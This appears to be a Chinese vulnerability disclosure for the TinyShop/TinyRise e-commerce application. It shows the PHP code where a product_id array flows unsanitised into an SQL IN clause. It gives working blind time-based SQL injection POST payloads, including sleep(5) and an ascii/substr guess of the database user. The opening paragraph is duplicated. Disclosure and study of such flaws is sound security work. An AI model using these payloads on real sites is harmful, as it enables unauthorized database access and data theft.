VULHUB ™

### 简要描述： TinyRise 最新版sql注入 ### 详细说明： simple.php: ``` $order_type = 2; }else if($type=="bundbuy"){//捆绑销售处理 $product_ids = implode(',', $product_id); $num = Filter::int($buy_num[0]); $model = new Model("bundling"); $bund = $model->where("id=$id")->find(); if($bund){ $goods_id = $bund['goods_id']; $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll(); $order_products = $this->packBundbuyProducts($products,$num); } ``` 这个地方存在sql注入 首先这 $product_ids = implode(',', $product_id); 然后： ``` $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll(); $order_products = $this->packBundbuyProducts($products,$num); ``` 这是 进入到sql注入 这里貌似只能进行盲注 访问url: http://localhost/tinyshopv1.1/index.php?con=simple&act=order_act...

### 简要描述： TinyRise 最新版sql注入 ### 详细说明： simple.php: ``` $order_type = 2; }else if($type=="bundbuy"){//捆绑销售处理 $product_ids = implode(',', $product_id); $num = Filter::int($buy_num[0]); $model = new Model("bundling"); $bund = $model->where("id=$id")->find(); if($bund){ $goods_id = $bund['goods_id']; $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll(); $order_products = $this->packBundbuyProducts($products,$num); } ``` 这个地方存在sql注入 首先这 $product_ids = implode(',', $product_id); 然后： ``` $products = $model->table("goods as go")->join("left join products as pr on pr.goods_id=go.id")->where("pr.id in ($product_ids)")->fields("*,pr.id as product_id,pr.spec")->group("go.id")->findAll(); $order_products = $this->packBundbuyProducts($products,$num); ``` 这是 进入到sql注入 这里貌似只能进行盲注 访问url: http://localhost/tinyshopv1.1/index.php?con=simple&act=order_act postdata: address_id=2&payment_id=1&user_remark=xxxxx%27&is_invoice=1&invoice_type=0&invoice_title=xxxxxx&type=bundbuy&id=1&product_id[]=sleep(5) 延迟五秒执行，那么下来我们怎么去猜测表 ： postdata: address_id=2&payment_id=1&user_remark=xxxxx%27&is_invoice=1&invoice_type=0&invoice_title=xxxxxx&type=bundbuy&id=1&product_id[]=sleep(if(ascii(substr((select user()),1,1))=$NUM,sleep(5),1))) 这里$NUM 这里就是我们php要测试的值 ### 漏洞证明：